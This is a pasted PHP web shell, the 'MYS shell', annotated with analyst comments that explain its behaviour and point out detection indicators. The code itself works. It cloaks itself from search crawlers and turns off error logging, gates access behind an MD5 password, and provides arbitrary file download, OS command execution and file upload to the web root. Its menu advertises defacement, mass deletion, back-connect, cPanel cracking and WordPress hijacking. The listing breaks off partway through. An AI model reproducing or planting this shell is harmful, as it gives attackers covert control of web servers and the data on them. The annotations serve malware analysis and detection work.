mhmalll

shell M.Y.S Pass:MHM

Oct 12th, 2018
  1. <?php
  // Analyst note: configuration preamble of a PHP web shell.
  // $auth_pass holds a 32-hex-character digest that the access gate later in this
  // file compares with md5($_POST['pass']). The literal is a static indicator for
  // this sample.
  2. $auth_pass = "67d4aef06984f2bf6ef5c20d4dff4e18";
  3. session_start();
  // Error reporting, error logging and error display are all switched off and the
  // execution time limit is removed, so PHP's own logs will not record activity.
  // Web-server access logs and file-integrity monitoring remain the evidence sources.
  4. error_reporting(0);
  5. set_time_limit(0);
  // set_magic_quotes_runtime() was removed in PHP 7.0; its use suggests the sample
  // was written for PHP 5.x (inference from the call, not stated in the file).
  6. @set_magic_quotes_runtime(0);
  7. @clearstatcache();
  8. @ini_set('error_log',NULL);
  9. @ini_set('log_errors',0);
  10. @ini_set('max_execution_time',0);
  11. @ini_set('output_buffering',0);
  12. @ini_set('display_errors', 0);
  13.  
  14.  
  // Defaults; none of these four variables is read again in the visible part of the file.
  15. $color = "#00FF00";
  16. $default_action = 'FilesMan';
  17. $default_use_ajax = true;
  18. $default_charset = 'UTF-8';
  // Crawler cloaking: a request whose User-Agent contains any of these substrings
  // (case-insensitive) receives a 404 status and no body, which keeps the file out of
  // search indexes. A scanner that presents a crawler-like User-Agent gets the same
  // 404, so detection should not depend on the HTTP response alone.
  19. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  20.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  21.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  22.         header('HTTP/1.0 404 Not Found');
  23.         exit;
  24.     }
  25. }
  26.  
  /**
   * Prints the login page and terminates the request.
   *
   * Everything between the closing and reopening PHP tags is static HTML/JS:
   * a window-title animation, remote favicon/background references and two
   * separate POST forms, one holding "id" and one holding "pass" plus the
   * submit button. Only "pass" is checked by the caller; "id" is never read in
   * the visible code. The fixed strings on this page (title "MYS TEAM", the
   * alert text, the remote image URLs) are content indicators that can be used
   * when searching web roots or proxy logs for this sample.
   */
  27. function login_shell() {
  28. ?>
  29. <html>
  30. <body><body> <script>    alert('^_^ MYS Shell By Ameer Awwad & MHM ^_^ ')   </script></body>
  31. <script type="text/javascript">
  32.     var message = new Array()
  33.         message[0] = " MYS SHELL";
  34.         message[1] = " MYS SHELL";
  35.         message[2] = " M_";
  36.         message[3] = " MY_";
  37.         message[4] = " MYS_";
  38.         message[5] = " MYS _";
  39.         message[6] = " MYS S_ ";
  40.         message[7] = " MYS SH_";
  41.         message[7] = " MYS SHE_";
  42.         message[8] = " MYS SHEL_";
  43.         message[10] = " MYS SHELL_";
  44.     var reps = 2
  45.     var speed =20
  46.     var p=message.length;
  47.     var T="";
  48.     var C=0;
  49.     var mC=0;
  50.     var s=0;
  51.     var sT=null;
  52.     if(reps<1)reps=1;
  53.     function doTheThing(){
  54.     T=message[mC];
  55.     A();}
  56.     function A(){
  57.     s++
  58.     if(s>9){s=1}
  59.     if(s==1){document.title=' '+T+' '}
  60.     if(C<(8*reps)){
  61.     sT=setTimeout("A()",speed);
  62.     C++
  63.     }else{
  64.     C=0;
  65.     s=0;
  66.     mC++
  67.     if(mC>p-1)mC=0;
  68.     sT=null;
  69.     doTheThing();}}
  70.     doTheThing();
  71. </script>
  72. <head>
  73. <title>MYS TEAM</title>
  74. <link href='https://thecryptoshow.com/wp-content/uploads/2017/11/fatcom-1.ico' rel='icon' type='image/x-icon'/>
  75. <style type="text/css">
  76. body {
  77.       background-color: #000000;
  78.     background-image: url(https://image.ibb.co/nir4Gp/41659939_2148223895394113_8730856789718859776_n.jpg);
  79.     <!--https://image.ibb.co/nir4Gp/41659939_2148223895394113_8730856789718859776_n.jpg-->
  80.     margin-left: 0px;
  81.     margin-top: 0px;
  82.     margin-right: 0px;
  83.     margin-bottom: 0px;
  84.     background-position:center;
  85.     background-repeat:no-repeat;
  86.     background-size:50%
  87. }
  88. html {
  89.      background:#387c6c;
  90.   -webkit-background-size: cover;
  91.   -moz-background-size: cover;
  92.   -o-background-size: cover;
  93.   background-size: cover;
  94. }
  95. html,body{margin:0;padding:0;height:100%;font:10px Arial;}
  96. #wrapper{min-height:100%;position:relative;}
  97. #header{background:#ff0000;padding:5px;height:50px;color:#3000ff;}
  98. #body{padding-bottom:40px;padding-left:10px;}
  99. #footer{background:#ff0000;position:absolute;bottom:0;width:100%;
  100.    text-align:center;color:#408080;}
  101. header {
  102.     color: ;
  103.     margin: 10px auto;
  104. }
  105.  
  106. </style>
  107. </head>
  108.  
  109. <center>
  110. <font face="monospace" size='3' color='cyan'><br>
  111.  
  112.  
  113. <header>
  114. <pre>
  115.     </pre>
  116. </header>
  117. <br><br><br><br><br><br><br><br>
  118. <fieldset>
  119.             <label for="login">Username</label>
  120.         <form method="post">
  121. <input type="text" name="id" value="MHM">
  122. </form>
  123. Password
  124. <form method="post">
  125. <input type="password" name="pass"> <br><br>
  126. <input type="submit" value="Login">
  127. </fieldset>
  128. </form>
  129. <style>
  130. </style>
  131. </head>
  132. <body>
  133.  
  134. </font>
  135. </body>
  136. </head>
  137. <table border="0" cellspacing="1" cellpadding="4" class="tborder"><tr><td class="thead"><strong></strong></td></tr><tr><td class="trow1"></a></td></tr></table><br />
  138. <table border="0" cellspacing="1" cellpadding="4" class="tborder">
  139. <tbody><tr>
  140. <?php
  // exit ends the request here, so nothing after the access gate runs for a
  // visitor who has not supplied the password.
  141. exit;
  142. }
  // Access gate. The session flag is keyed by the MD5 of the Host header. An empty
  // $auth_pass disables authentication entirely; otherwise md5($_POST['pass']) is
  // compared with the stored digest using loose ==, not hash_equals(). The
  // statement has no braces: the else binds to the inner if, so login_shell()
  // runs only when there is no session flag and the password check fails.
  143. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  144.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  145.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  146.     else
  147.         login_shell();
  // File download for an authenticated session: the path in ?file= is used verbatim
  // (only the Content-Disposition name goes through basename()), so any file readable
  // by the PHP process can be returned. In access logs this shows up as requests
  // carrying both file= and act=download. $_GET['act'] is read without an isset() check.
  148. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  149.     @ob_clean();
  150.     $file = $_GET['file'];
  151.     header('Content-Description: File Transfer');
  152.     header('Content-Type: application/octet-stream');
  153.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  154.     header('Expires: 0');
  155.     header('Cache-Control: must-revalidate');
  156.     header('Pragma: public');
  157.     header('Content-Length: ' . filesize($file));
  158.     readfile($file);
  159.     exit;
  160. }
  161. ?>
  162. <html>
  163. <head>
  164. <title>MYS shell </title>
  165. <meta name='author' content='Recode MYS Team'>
  166. <meta charset="UTF-8">
  167. <link href='https://thecryptoshow.com/wp-content/uploads/2017/11/fatcom-1.ico' rel='icon' type='image/x-icon'/>
  168. <style type='text/css'>
  169. @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
  170. html {
  171.     background: #2d4746;
  172.     color: #00ffe9;
  173.     font-family: 'Share Tech Mono';
  174.     font-size: 12px;
  175.     width: 100%;
  176. }
  177. li {
  178.     display: inline;
  179.     margin: 1px;
  180.     padding: 1px;
  181. }
  182.  
  183.  #menu{
  184.     background:#2D4746;
  185.     margin:9px 3px 4px 2px;
  186. }
  187. #menu a{
  188.     padding:4px 19px;
  189.     margin:0;
  190.     background:#3b5653;
  191.     text-decoration:none;
  192.     letter-spacing:2px;
  193.     -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  194.  
  195. }
  196. #menu a:hover{
  197.     background:#3b5653;
  198.     border-bottom:1px solid #4a7a75;
  199.     border-top:1px solid #4a7a75;
  200. }
  201. .explore tr:hover{background:#3b5653}
  202. table tr:first-child{  
  203.     background: #619996;
  204.     text-align: center;
  205.     color: white;
  206. }
  207. table, th, td {
  208.     border-collapse:collapse;
  209.     font-family: Tahoma, Geneva, sans-serif;
  210.     background: transparent;
  211.     font-family: 'Share Tech Mono';
  212.     font-size: 13px;
  213. }
  214. .table_home, .th_home, .td_home {
  215.     border: 1px solid #619996;
  216. }
  217. th {
  218.     padding: 10px;
  219. }
  220. a {
  221.     color: #00ffe9;
  222.     text-decoration: none;
  223. }
  224. a:hover {
  225.     color: red;
  226.     text-decoration: underline;
  227. }
  228. b {
  229.     color: white;
  230. }
  231. input[type=text], input[type=password],input[type=submit] {
  232.     background: transparent;
  233.     color: #00ffe9;
  234.     border: 1px solid #00ffe9;
  235.     margin: 5px auto;
  236.     padding-left: 5px;
  237.     font-family: 'Share Tech Mono';
  238.     font-size: 13px;
  239. }
  240. input[type=submit] {
  241.     background: #619996;
  242.     color: #00ffe9;
  243.     border: 1px solid #00ffe9;
  244.     margin: 5px auto;
  245.     padding-left: 5px;
  246.     font-family: 'Share Tech Mono';
  247.     font-size: 13px;
  248.     cursor:pointer;
  249. }
  250. textarea {
  251.     border: 1px solid #00ffe9;
  252.     width: 100%;
  253.     height: 400px;
  254.     padding-left: 5px;
  255.     margin: 10px auto;
  256.     resize: none;
  257.     background: transparent;
  258.     color: #ffffff;
  259.     font-family: 'Share Tech Mono';
  260.     font-size: 13px;
  261. }
  262. select {
  263.     width: 152px;
  264.     background: #435651;
  265.     color: white;
  266.     border: 1px solid #00ffe9;
  267.     margin: 5px auto;
  268.     padding-left: 5px;
  269.     font-family: 'Share Tech Mono';
  270.     font-size: 13px;
  271. }
  272. option:hover {
  273.     background: white;
  274.     color: #435651;
  275. }
  276. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
  277. .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
  278. .infoweb {
  279.     border-right: 1px solid #00FFFF;
  280. }
  281. </style>
  282. </head>
  283. <?php
  284. ###############################################################################
  285. //     Mngganti Copyright tidak akan menjadikan anda sebagai programer
  286. ###############################################################################
  /**
   * Wraps $perm in a <font> tag: green when is_writable($dir) is true for the PHP
   * process, red otherwise. $perm is concatenated into the markup without HTML
   * escaping.
   */
  287. function w($dir,$perm) {
  288.     if(!is_writable($dir)) {
  289.         return "<font color=red>".$perm."</font>";
  290.     } else {
  291.         return "<font color=green>".$perm."</font>";
  292.     }
  293. }
  /**
   * Wraps $perm in a <font> tag: green when is_readable($dir) is true for the PHP
   * process, red otherwise. $perm is concatenated into the markup without HTML
   * escaping.
   */
  294. function r($dir,$perm) {
  295.     if(!is_readable($dir)) {
  296.         return "<font color=red>".$perm."</font>";
  297.     } else {
  298.         return "<font color=green>".$perm."</font>";
  299.     }
  300. }
  /**
   * Runs $cmd through the first of system(), exec(), passthru(), shell_exec() for
   * which function_exists() is true, and returns the captured output.
   *
   * $cmd reaches the OS shell unmodified, and the 'cmd' action later in this file
   * passes $_POST['cmd'] straight in. The exec() branch joins output lines with no
   * separator. If none of the four functions exists the function falls off the end
   * and returns null. All calls are prefixed with @, so warnings are silenced.
   *
   * Defensive relevance: the host-level trace of this function is a shell or
   * interpreter process spawned as a child of the web-server/PHP worker. Functions
   * listed in the disable_functions directive fail the function_exists() test, so
   * the corresponding branch is skipped.
   */
  301. function exe($cmd) {
  302.     if(function_exists('system')) {        
  303.         @ob_start();       
  304.         @system($cmd);     
  305.         $buff = @ob_get_contents();        
  306.         @ob_end_clean();       
  307.         return $buff;  
  308.     } elseif(function_exists('exec')) {        
  309.         @exec($cmd,$results);      
  310.         $buff = "";        
  311.         foreach($results as $result) {         
  312.             $buff .= $result;      
  313.         } return $buff;    
  314.     } elseif(function_exists('passthru')) {        
  315.         @ob_start();       
  316.         @passthru($cmd);       
  317.         $buff = @ob_get_contents();        
  318.         @ob_end_clean();       
  319.         return $buff;  
  320.     } elseif(function_exists('shell_exec')) {      
  321.         $buff = @shell_exec($cmd);     
  322.         return $buff;  
  323.     }
  324. }
  /**
   * Builds an ls-style ten-character mode string from fileperms($file): one file-type
   * character followed by owner, group and world rwx triplets, with s/S, s/S and t/T
   * standing for setuid, setgid and sticky in the execute positions.
   *
   * The return value of fileperms() is not checked; when it is false every mask test
   * fails and the result is 'u---------'.
   */
  325. function perms($file){
  326.     $perms = fileperms($file);
  // File type is taken from the high bits, tested from the most specific mask down.
  327.     if (($perms & 0xC000) == 0xC000) {
  328.     // Socket
  329.     $info = 's';
  330.     } elseif (($perms & 0xA000) == 0xA000) {
  331.     // Symbolic Link
  332.     $info = 'l';
  333.     } elseif (($perms & 0x8000) == 0x8000) {
  334.     // Regular
  335.     $info = '-';
  336.     } elseif (($perms & 0x6000) == 0x6000) {
  337.     // Block special
  338.     $info = 'b';
  339.     } elseif (($perms & 0x4000) == 0x4000) {
  340.     // Directory
  341.     $info = 'd';
  342.     } elseif (($perms & 0x2000) == 0x2000) {
  343.     // Character special
  344.     $info = 'c';
  345.     } elseif (($perms & 0x1000) == 0x1000) {
  346.     // FIFO pipe
  347.     $info = 'p';
  348.     } else {
  349.     // Unknown
  350.     $info = 'u';
  351.     }
  352.         // Owner
  353.     $info .= (($perms & 0x0100) ? 'r' : '-');
  354.     $info .= (($perms & 0x0080) ? 'w' : '-');
  // 0x0800 is the setuid bit: lowercase when execute is also set, uppercase when not.
  355.     $info .= (($perms & 0x0040) ?
  356.     (($perms & 0x0800) ? 's' : 'x' ) :
  357.     (($perms & 0x0800) ? 'S' : '-'));
  358.     // Group
  359.     $info .= (($perms & 0x0020) ? 'r' : '-');
  360.     $info .= (($perms & 0x0010) ? 'w' : '-');
  // 0x0400 is the setgid bit, rendered the same way.
  361.     $info .= (($perms & 0x0008) ?
  362.     (($perms & 0x0400) ? 's' : 'x' ) :
  363.     (($perms & 0x0400) ? 'S' : '-'));
  364.     // World
  365.     $info .= (($perms & 0x0004) ? 'r' : '-');
  366.     $info .= (($perms & 0x0002) ? 'w' : '-');
  // 0x0200 is the sticky bit, shown as t/T.
  367.     $info .= (($perms & 0x0001) ?
  368.     (($perms & 0x0200) ? 't' : 'x' ) :
  369.     (($perms & 0x0200) ? 'T' : '-'));
  370.     return $info;
  371. }
  /**
   * Formats a byte count $s as a string with two decimals and a GB, MB or KB suffix,
   * using powers of 1024 as thresholds; values below 1024 are returned unformatted
   * with ' B' appended.
   */
  372. function hdd($s) {
  373.     if($s >= 1073741824)
  374.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
  375.     elseif($s >= 1048576)
  376.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
  377.     elseif($s >= 1024)
  378.     return sprintf('%1.2f',$s / 1024 ) .' KB';
  379.     else
  380.     return $s .' B';
  381. }
  /**
   * Returns the part of $param that lies between the first occurrence of $kata1 and
   * the next occurrence of $kata2 after it; returns FALSE when either marker is
   * absent from $param.
   *
   * The second search can still fail when $kata2 occurs only before $kata1; $end is
   * then false and the length passed to substr() is negative, so the result in that
   * case is not a delimited match.
   */
  382. function ambilKata($param, $kata1, $kata2){
  383.     if(strpos($param, $kata1) === FALSE) return FALSE;
  384.     if(strpos($param, $kata2) === FALSE) return FALSE;
  385.     $start = strpos($param, $kata1) + strlen($kata1);
  386.     $end = strpos($param, $kata2, $start);
  387.     $return = substr($param, $start, $end - $start);
  388.     return $return;
  389. }
  /**
   * Fetches $url with cURL and returns the response body (curl_exec() returns false
   * on failure, which is passed through unchanged).
   *
   * Redirects are followed, and both TLS peer verification and host-name verification
   * are switched off, so the identity of the remote server is not checked. On a
   * compromised host this function is a source of outbound HTTP(S) connections made
   * by the PHP process, which egress filtering or proxy logs can surface.
   */
  390. function getsource($url) {
  391.     $curl = curl_init($url);
  392.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  393.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  394.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  395.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  396.     $content = curl_exec($curl);
  397.             curl_close($curl);
  398.     return $content;
  399. }
  /**
   * Pages through Bing search results for the query $dork via getsource() and echoes
   * the distinct host names found, one per line. Nothing is returned.
   *
   * $dork is concatenated into the URL without URL-encoding. The loop advances the
   * "first" offset by 10 and stops when a fetch fails, when the page contains no link
   * to the next offset, or when the offset exceeds 30000. $lll, $linksuiv and $sss
   * are assigned but never used. Host names come from element 2 of each URL split on
   * "/", which presumes absolute URLs in the matched href values.
   *
   * Defensive relevance: repeated outbound requests from a web server to a search
   * engine with incrementing "first=" values are unusual for most applications.
   */
  400. function bing($dork) {
  401.     $npage = 1;
  402.     $npages = 30000;
  403.     $allLinks = array();
  404.     $lll = array();
  405.     while($npage <= $npages) {
  406.         $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  407.         if($x) {
  408.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  409.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  410.             $npage = $npage + 10;
  411.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  412.         } else break;
  413.     }
  414.     $URLs = array();
  415.     foreach($allLinks as $url){
  416.         $exp = explode("/", $url);
  417.         $URLs[] = $exp[2];
  418.     }
  419.     $array = array_filter($URLs);
  420.     $array = array_unique($array);
  421.     $sss = count(array_unique($array));
  422.     foreach($array as $domain) {
  423.         echo $domain."\n";
  424.     }
  425. }
  /**
   * Sends $url as "remoteAddress" in a POST to the reverse-IP lookup endpoint at
   * domains.yougetsignal.com and echoes each entry of the reply as "http://<entry>",
   * flushing output after every line. Nothing is returned.
   *
   * $url is interpolated into the POST body without URL-encoding. The reply is not
   * decoded as JSON; brackets, braces, quotes and colons are stripped with nested
   * str_replace() calls and the remainder is split on ",,", with the first element
   * discarded. The result of curl_exec() is not checked for failure.
   *
   * Defensive relevance: an outbound POST from a web server to this third-party
   * lookup service is an egress indicator for this tool family.
   */
  426. function reverse($url) {
  427.     $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  428.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  429.           curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
  430.           curl_setopt($ch, CURLOPT_HEADER, 0);
  431.           curl_setopt($ch, CURLOPT_POST, 1);
  432.     $resp = curl_exec($ch);
  433.     $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  434.     $array = explode(",,", $resp);
  435.     unset($array[0]);
  436.     foreach($array as $lnk) {
  437.         $lnk = "http://$lnk";
  438.         $lnk = str_replace(",", "", $lnk);
  439.         echo $lnk."\n";
  440.         ob_flush();
  441.         flush();
  442.     }
  443.         curl_close($ch);
  444. }
  // Legacy magic-quotes handling: when the feature is on, slashes are stripped
  // recursively from $_POST and $_COOKIE ($_GET is left as received).
  // get_magic_quotes_gpc() was deprecated in PHP 7.4 and removed in PHP 8.0, so on
  // PHP 8 this unguarded call is a fatal error and the script stops at this line.
  445. if(get_magic_quotes_gpc()) {
  446.     function idx_ss($array) {
  447.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  448.     }
  449.     $_POST = idx_ss($_POST);
  450.     $_COOKIE = idx_ss($_COOKIE);
  451. }
  452.  
  // Working directory: taken verbatim from ?dir= and applied with chdir() (the return
  // value is not checked), otherwise the script's current directory.
  453. if(isset($_GET['dir'])) {
  454.     $dir = $_GET['dir'];
  455.     chdir($dir);
  456. } else {
  457.     $dir = getcwd();
  458. }
  // Host inventory gathered on every page load: OS identification, the address the
  // Host header resolves to, disk usage, PHP restrictions and available tooling.
  459. $kernel = php_uname();
  460. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  461. $dir = str_replace("\\","/",$dir);
  462. $scdir = explode("/", $dir);
  463. $freespace = hdd(disk_free_space("/"));
  464. $total = hdd(disk_total_space("/"));
  // $total and $freespace are already formatted strings (number plus unit) at this
  // point, so the subtraction uses only their leading numeric parts and ignores units.
  465. $used = $total - $freespace;
  466. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=green>OFF</font>";
  467. $ds = @ini_get("disable_functions");
  468. $mysql = (function_exists('mysql_connect')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
  469. $curl = (function_exists('curl_version')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
  // Each of the next three lines runs an external command through exe(). A PHP/web
  // server worker spawning "wget --help", "perl --help" and "python --help" in quick
  // succession is a recognisable pattern in process telemetry.
  470. $wget = (exe('wget --help')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
  471. $perl = (exe('perl --help')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
  472. $python = (exe('python --help')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
  473. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=green>NONE</font>";
  // Identity of the PHP process: POSIX lookups when the extension is present,
  // otherwise the script owner's name/uid/gid with the group name shown as "?".
  474. if(!function_exists('posix_getegid')) {
  475.     $user = @get_current_user();
  476.     $uid = @getmyuid();
  477.     $gid = @getmygid();
  478.     $group = "?";
  479. } else {
  480.     $uid = @posix_getpwuid(posix_geteuid());
  481.     $gid = @posix_getgrgid(posix_getegid());
  482.     $user = $uid['name'];
  483.     $uid = $uid['uid'];
  484.     $group = $gid['name'];
  485.     $gid = $gid['gid'];
  486. }
  // Status banner: prints the inventory collected above. All values, including the
  // request-supplied directory and REMOTE_ADDR, are written into HTML without escaping.
  487. echo "System: <font color=green>".$kernel."</font><br>";
  488. echo "User: <font color=green>".$user."</font> (".$uid.") Group: <font color=green>".$group."</font> (".$gid.")<br>";
  489. echo "Server IP: <font color=green>".$ip."</font> | Your IP: <font color=green>".$_SERVER['REMOTE_ADDR']."</font><br>";
  490. echo "HDD: <font color=green>$used</font> / <font color=green>$total</font> ( Free: <font color=green>$freespace</font> )<br>";
  491. echo "Safe Mode: $sm<br>";
  492. echo "Disable Functions: $show_ds<br>";
  493. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  494. echo "Current DIR: ";
  // Breadcrumb: one link per path segment, each pointing at ?dir=<path up to that segment>.
  495. foreach($scdir as $c_dir => $cdir) {   
  496.     echo "<a href='?dir=";
  497.     for($i = 0; $i <= $c_dir; $i++) {
  498.         echo $scdir[$i];
  499.         if($i != $c_dir) {
  500.         echo "/";
  501.         }
  502.     }
  503.     echo "'>$cdir</a>/";
  504. }
  505.  
  506. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  507. echo "<hr>";
  508. echo "<center>";
  509. echo "<ul>";
  510. echo "<center><font size='10px' color='white'><bold>MYS shell</bold></font>";
  511. echo "<center>Copyright &copy; ".date("Y")." - <a href='https://web.facebook.com/official.MYS.te/' target='_blank'><font color=red>MYS Team</font></a></center>";
  512. echo "<br>";
  // Action menu. Every entry is a link of the form ?dir=<dir>&do=<action>; the "do"
  // values listed here are the query-string tokens the dispatcher below switches on,
  // which makes them usable as access-log search terms for this sample.
  513. echo '<center><div id="menu">';
  514. echo "<li> <a href='?'>Home</a> </li>";
  515. echo "<li> <a href='?dir=$dir&do=upload'>Upload</a> </li>";
  516. echo "<li> <a href='?dir=$dir&do=cmd'>Command</a> </li>";
  517. echo "<li> <a href='?dir=$dir&do=mass_deface'>mass_deface</a> </li>";
  518. echo "<li> <a href='?dir=$dir&do=mass_delete'>mass_delete</a> </li>";
  519. echo "<li> <a href='?dir=$dir&do=config'>config</a> </li>";
  520. echo "<li> <a href='?dir=$dir&do=jumping'>jumping</a> </li>";
  521. echo "<li> <a href='?dir=$dir&do=network'>Back Connect</a> </li>";
  522. echo "<li> <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a></li><br><br>";
  523. echo "<li> <a href='?dir=$dir&do=symlink'>Symlink</a> </li>";
  524. echo "<li> <a href='?dir=$dir&do=cpanel'>Cpanel crack</a> </li>";
  525. echo "<li> <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> </li>";
  526. echo "<li> <a href='?dir=$dir&do=zoneh'>Zone-H</a> </li>";
  527. echo "<li> <a href='?dir=$dir&do=cgi'>CGI Telnet</a> </li>";
  528. echo "<li> <a href='?dir=$dir&do=network'>network</a> </li>";
  529. echo "<li> <a href='?dir=$dir&do=fake_root'>Fake Root</a> </li>";
  530. echo "<li> <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> </li>";
  531. echo "<li> <a href='?dir=$dir&do=adminer'>adminer</a> </li><br><br>";
  532. echo "<li> <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> </li>";
  533. echo "<li> <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> </li>";
  534. echo "<li> <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface 2</a> </li>";
  535. echo "<li> <a href='?dir=$dir&do=ports'>Port Scanner</a></li>";
  536. echo "<li> <a href='?dir=$dir&do=hijack_wp'>Wp Auto Hijack</a> </li>";
  537. echo "<li> <a href='?dir=$dir&do=reverse'>ReverseIP</a> </li><br><br>";
  538. echo "<li> <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> </li>";
  539. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF Online</a> </li>";
  540. echo "<li> <a href='?do=bypass'>Disable Function</a> </li>";
  541. echo "<li> <a href='?dir=$dir&do=endec'>Script Encode & Decode</a> </li>";
  542. echo "<li> <a href='?dir=$dir&do=adfin'>Admin Finder</a> </li>";
  543. echo "<li> <a href='?dir=$dir&do=ngindexx'>NginDexer</a> </li>";
  544. echo "<li> <a href='?dir=$dir&do=whmcsdecod'>WHMCS Decoder</a> </li><br><br>";
  545. echo "<li> <a href='?dir=$dir&do=contact'>Contact Me</a></li>";
  546. echo "<li> <a href='?dir=$dir&do=about'>About Me</a></li>";
  547. echo "<li> <a style='color: red;' href='?logout=true'>logout</a> </li>";
  548. echo "</ul>";
  549. echo "</center>";
  550. echo "<hr>";
  551. if($_GET['logout'] == true) {
  552.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  553.     echo "<script>window.location='?';</script>";
  554. } elseif($_GET['do'] == 'upload') {
  555.     echo "<center>";
  556.     if($_POST['upload']) {
  557.         if($_POST['tipe_upload'] == 'biasa') {
  558.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  559.                 $act = "<font color=green>Yes !! Succeed sir!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  560.             } else {
  561.                 $act = "<font color=red>Failed !! Sorry Sir</font>";
  562.             }
  563.         } else {
  564.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  565.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  566.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  567.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  568.                     $act = "<font color=green>Yes !! Succeed sir!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  569.                 } else {
  570.                     $act = "<font color=red>Failed !! Sorry Sir</font>";
  571.                 }
  572.             } else {
  573.                 $act = "<font color=red>Failed !! Sorry Sir</font>";
  574.             }
  575.         }
  576.     }
  577.     echo "Upload File:
  578.     <form method='post' enctype='multipart/form-data'>
  579.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  580.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  581.     <input type='file' name='ix_file'>
  582.     <input type='submit' value='upload' name='upload'>
  583.     </form>";
  584.     echo $act;
  585.     echo "</center>";
  586. } elseif($_GET['do'] == 'hijack_wp')
  587.     {
